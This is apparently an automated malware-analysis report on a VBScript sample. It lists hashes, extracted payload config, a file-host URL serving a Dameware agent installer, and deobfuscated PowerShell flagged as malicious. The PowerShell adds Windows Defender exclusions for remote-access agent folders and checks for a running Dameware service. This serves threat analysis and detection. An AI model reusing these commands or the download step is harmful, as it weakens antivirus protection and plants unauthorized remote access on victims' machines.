6d2d4e8753f3caa0145ce51bbb77947e
VBScript | MD5: 6d2d4e8753f3caa0145ce51bbb77947e | Size: 7.11 KB | text/vbscript
|
Hash | Hash Value |
|---|---|
| MD5 | 6d2d4e8753f3caa0145ce51bbb77947e
|
| Sha1 | 487a68869b213ec6bec2414c563144eea61c4b71
|
| Sha256 | 2d4cd81e04222bdbefa5f3cb4713941bba6de7a34833390e1689d1b00c6af71f
|
| Sha384 | 3f83e08b421376d5f98eb42b0ee990e7e1b9e3d7da4620ba0b76d0e6dccba3e2ff77c0ec200a52f58b468fc3a36185a4
|
| Sha512 | cb7e85f6ea015e2cfe06b2aab71829d5ae6f7610ee1c06bc3c642417d8a30558de38b12f1906efaa60f3a20b4e713219f1606b81e4062eac025cc2c0bf1f5ae8
|
| SSDeep | 192:tuakZ4o/6/zc/e/3v7E/e/UBl7/yRGYIQ6/i/6Jsm/W:tuz+ZyqsQLV
|
| TLSH | 0DE1974B610702B4C07386BBA576261EF86521675B891814FADD8691CF3CB2FF3F50EA
|
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cacheBustedUrl & |
| Payload Destination | & tmpFile & |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://store-na-phx-5.gofile.io/download/direct/5c1b5bc3-6755-461a-86dd-10b822557c22/DamewareAgent.msi |
| Deobfuscated PowerShell | Add-MpPreference -ExclusionPath @("$env:TEMP", "C:\Program Files\TacticalAgent", "C:\Program Files (x86)\DamewareRemoteEverywhere", "C:\ProgramData\TacticalAgent", "C:\Program Files\Mesh Agent") |
| Deobfuscated PowerShell | $s = Get-Service | Where-Object $_."DisplayName" -like "*SolarWinds*" -or $_."DisplayName" -like "*Dameware Remote Everywhere Agent*" if ($s | Where-Object $_."Status" -eq "Running") { exit 0 } else { exit 1 } |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cacheBustedUrl & |
| Payload Destination | & tmpFile & |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |
|
Config. Field0 | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://store-na-phx-5.gofile.io/download/direct/5c1b5bc3-6755-461a-86dd-10b822557c22/DamewareAgent.msi |
6d2d4e8753f3caa0145ce51bbb77947e |
| Deobfuscated PowerShell | Add-MpPreference -ExclusionPath @("$env:TEMP", "C:\Program Files\TacticalAgent", "C:\Program Files (x86)\DamewareRemoteEverywhere", "C:\ProgramData\TacticalAgent", "C:\Program Files\Mesh Agent") Malicious |
6d2d4e8753f3caa0145ce51bbb77947e > 6d2d4e8753f3caa0145ce51bbb77947e.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | $s = Get-Service | Where-Object $_."DisplayName" -like "*SolarWinds*" -or $_."DisplayName" -like "*Dameware Remote Everywhere Agent*" if ($s | Where-Object $_."Status" -eq "Running") { exit 0 } else { exit 1 } Malicious |
6d2d4e8753f3caa0145ce51bbb77947e > 6d2d4e8753f3caa0145ce51bbb77947e.deobfuscated.vbs > [Command #1] > [PowerShell Command] |